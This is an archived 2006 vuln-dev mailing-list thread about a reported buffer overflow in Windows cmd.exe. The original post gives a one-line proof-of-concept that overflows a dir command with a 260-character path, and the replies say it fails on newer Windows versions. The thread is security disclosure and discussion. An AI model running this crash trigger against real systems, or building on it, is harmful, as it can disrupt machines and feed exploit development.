RE: Windows Command Processor CMD.EXE Buffer Overflow

["RockyH" <rocky.he () g-wizinnovations com>]

It didn't work on Windows Server 2003 or Windows 2000 either. (fully patched
and latest SPs)

RH

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of Osvaldo Casagrande
Sent: Friday, 20 October 2006 9:52 PM
To: gregory_panakkal; vuln-dev () securityfocus com
Subject: RE: Windows Command Processor CMD.EXE Buffer Overflow

It does not works on Windows Vista RC1 (5728)


Osvaldo Casagrande 
MCSE. MCT, MVP, Security+
Gerente de Servicios 
DiviServ S.A.
D: 595(21) 613 828 | Cel. 595 (971) 300 836 | |: ocasagrande () diviserv com | 
Add me to messenger

Busca mis referencias? / Looking for my personal references?
Acces to Programa MVP - Access to Certificaciones MS On "Transcript ID"
input: 740381 / On "Access Code" input: ViewMyInfo

Running Windows Vista RC1- Build 5728 and Office 2007 Beta 2 TR

CONFIDENCIALIDAD: La informacion contenida en este mail y sus anexos es
confidencial y/o privilegiada y esta reservada para el destinatario
unicamente.  Si usted no es el destinatario o un agente responsable de
enviar este mensaje al destinatario final, se le notifica que: No puede
utilizarlo, retransmitirlo, imprimirlo, copiarlo o divulgar las
informaciones contenidas en este mail o sus anexos o tomar cualquier accion
basada en estas informaciones. Si usted recibe este mensaje por error, por
favor avise inmediatamente al remitente, y tenga la amabilidad de borrarlo
de su computadora o cualquier otro banco de datos. DIVISERV agradece su
cooperacion. 

This mail message may contain confidential and/or privileged information for
the adressee. If you are not the addressee or authorized to receive this for
the addressee, you must not use, copy, print, retransmit, disclose or take
any action based on this message or any information herein. If you have
received this message by mistake, please advise the sender immediately
replying this message and delete it from your computer and any database.
DIVISERV appreciates your cooperation.

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of gregory_panakkal
Sent: Wednesday, October 18, 2006 11:33 PM
To: vuln-dev () securityfocus com
Subject: Windows Command Processor CMD.EXE Buffer Overflow


Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low


Copy-paste the following line in cmd.exe and execute it..
(it is a single command, has been split into multiple lines for
readability sake).

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL :
http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buff
er-overflow.html

regards,
Gregory Panakkal
www.infogreg.com
-- 
  gregory_panakkal
  gregory_panakkal () fastmail fm

-- 
http://www.fastmail.fm - I mean, what is it about a decent email service?